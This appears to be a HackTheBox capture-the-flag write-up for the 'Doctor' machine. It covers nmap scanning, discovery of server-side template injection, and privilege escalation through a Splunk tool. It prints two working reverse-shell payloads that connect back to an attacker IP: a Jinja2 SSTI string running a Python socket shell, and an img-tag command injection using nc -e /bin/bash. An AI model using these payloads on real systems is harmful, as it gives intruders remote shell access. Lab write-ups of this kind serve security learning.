image-20201009214428794

Author Ikonw

Nmap

# Nmap 7.80 scan initiated Sun Sep 27 09:39:47 2020 as: nmap -Pn -sCV -p22,80,8089 -oN nmap/Full_10.129.11.0.nmap 10.129.11.0
Nmap scan report for doctor.htb (10.129.11.0)
Host is up (0.25s latency).

PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http     Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Doctor
8089/tcp open  ssl/http Splunkd httpd
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Splunkd
|_http-title: splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2020-09-06T15:57:27
|_Not valid after:  2023-09-06T15:57:27
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Start enumeration on port 80, found the info@doctors.htb email.

Let’s add the hostname doctors.htb to /etc/hosts

image-20201009214518677

After adding to host file, visit doctors.htb come to a login page

image-20201009214618490

Tried to use info@doctors.htb to login, with the reset password function, we can verify that info@doctors.htb is not a valid account.

image-20201009214740397

Once we register, there’s only one function.

image-20201009214919652

From the page source, we found /archive but it appears to be blank page

image-20201009214950290

The New Post is vulnerable to server site template injection

Server Side Template Injection Payloads

image-20201009220337033

When we input {{7*7}} , we notice that it is shown on the /archive page.

can confirmed that it is using either Twig or Jinja2

Next up, craft a malicious payload to obtain reverse connecction

{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.67\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\", \"-i\"]);'").read()}}{%endif%}{%endfor%}

Another way would be using malicious curl command, this seems the unintended way

<img src=http://10.10.14.67:1337/$(nc.traditional$IFS-e$IFS/bin/bash$IFS'10.10.14.67'$IFS'4444')>

image-20201010132416445

WWW-data to User

Went to /home directory we found user shaun

Found user password in /var/log/apache/backup

And we can switch to user shaun.

Using the privilege escalation suggester we got the splunk is vulnerable.

By using the https://github.com/cnotin/SplunkWhisperer2 we are able to get privileges’ to root

Initial foothold is more annoying, from www-data to user to root is easy




root